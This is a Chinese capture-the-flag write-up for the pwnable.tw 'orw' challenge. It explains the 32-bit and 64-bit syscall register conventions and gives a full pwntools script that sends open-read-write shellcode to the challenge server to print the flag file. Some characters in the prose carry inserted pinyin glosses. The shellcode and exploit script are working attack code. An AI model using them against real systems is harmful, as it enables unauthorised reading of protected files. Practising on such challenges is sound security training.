考驗我們直接編寫shellcode的能力,這里注意
對于32位程序,應(yīng)調(diào)用int $0x80進入系統(tǒng)調(diào)用,將系統(tǒng)調(diào)用號傳入eax,各個參數(shù)按照ebx、ecx、edx的順序傳遞到寄存器中,系統(tǒng)調(diào)用返回值儲存到eax寄存器。
對于64位程序,應(yīng)調(diào)用syscall進入系統(tǒng)調(diào)用,將系統(tǒng)調(diào)用號傳入rax,各個參數(shù)按照rdi、rsi、rdx的順序傳遞到寄存器中,系統(tǒng)調(diào)用返回值儲存到rax寄存器。
exp:
from pwn import *
context.binary = './orw'
#p = process('./orw')
p = remote('chall.pwnable.tw', 10001)
shellcode = asm(
#fd = open('/home/orw/flag',0)
'''
push 0x00006761;
push 0x6c662f77;
push 0x726f2f65;
push 0x6d6f682f;
mov ecx, 0x0;
mov ebx, esp;
mov eax, 0x5;
int 0x80;
'''
#read(fd,bss+0x200,0x40)
'''
mov ebx, eax;
mov ecx, 0x0804A260;
mov edx, 0x40;
mov eax, 0x3;
int 0x80;
'''
#write(1,bss+0x200,0x40)
'''
mov ebx, 0x1;
mov ecx, 0x0804A260;
mov edx, 0x40;
mov eax, 0x4;
int 0x80;
'''
)
p.sendline(shellcode)
p.interactive()
參考文章: